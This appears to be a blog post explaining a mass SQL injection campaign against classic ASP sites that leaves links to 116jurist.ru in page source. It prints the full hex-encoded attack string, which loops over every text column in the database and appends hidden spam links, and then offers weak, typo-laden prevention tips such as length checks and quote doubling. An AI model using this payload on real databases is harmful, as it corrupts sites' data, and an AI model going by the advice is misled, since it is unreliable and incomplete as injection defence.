SQL Injection attack if you see in page view source http: 116jurist.ru

SQL Injection attack if you see in page view source http://116jurist.ru
In classic ASP website, attacker use the following technique to make SQL Injection. Its very simple way. They attach their hexadecimal code with the querystring and when code get the value from querystring and execute in db then it run and corrupt  the database. I can help you to solve your problem, Click here to contact me

This is one of the example string that used in SQL Injection, attacker can make any type of string using below way.

youpage.asp?id=101+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b275d292b27273c2f7469746c653e3c7374796c653e2e616a636a7b706f736974696f6e3a6162736f6c7574653b636c69703a726563742834383970782c6175746f2c6175746f2c3438397078293b7d3c2f7374796c653e3c64697620636c6173733d616a636a3e3c6120687265663d687474703a2f2f3131366a75726973742e7275203efef0e8f1f23c2f613e3c2f6469763e2727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--

So please make few change to prevent this problem and these are basic and necessary in all the code.
1) Check the lenght of querystring because pass to db query and pass only if it matached the minimum data info you from querystring.

Like asp.?id=101&name=infoA2Z

Then add the check Len(request("id")<10  else response.redirect("homepage.asp")

In this case query will execute if length is less than 10 otherwise page will move to home page and no chance of SQL Injection.

2) Use Replace to single quote like id=replaace(id,"'","''")

 

Related Alrticles

• Download sql-introduction
• Download introduction
• Download get-columns-of-a-table-sql-server
• Download convert-float-value-to-varchar-type-in-ms-sql-server
• Download sql-server-datatypes
• Download set-nocount-on-improves-sql-server-stored-procedure-performance-high
• Download how-attackers-make-sql-injection-attack-what-script-they-used-for-sql-injection
• Download how-to-make-or-use-cursor-in-sql-server
• Download count-duplicate-records-from-table-in-sql-server
• Download delete-duplicate-records-from-table-sql-server
• Download quick-fix-to-prevent-sql-injection-attach-sql-server-Asp-Net-asp
• Download how-to-make-and-use-temporary-tables-in-sql-server
• Download stored-procedure-to-make-listing-and-search-between-to-and-from-date-or-start-date-end-date
• Download use-of-begin-commit-transaction-rollback-in-a-stored-procedure-sql-server
• Download sql-injection-attack-if-you-see-in-page-view-source-http-116jurist-ru
• Download replacing-all-text-within-brackets-or-any-other-special-character-by-ms-sql-query
• Download how-to-update-data-as-first-letter-upper-case-ms-sql-query
• Download rename-a-column-name-or-table-name-stored-procedure-name-in-ms-sql-server
• Download update-existing-column-datatype-in-ms-sql-server-database-without-losing-data
• Download compare-null-values-in-ms-sql-server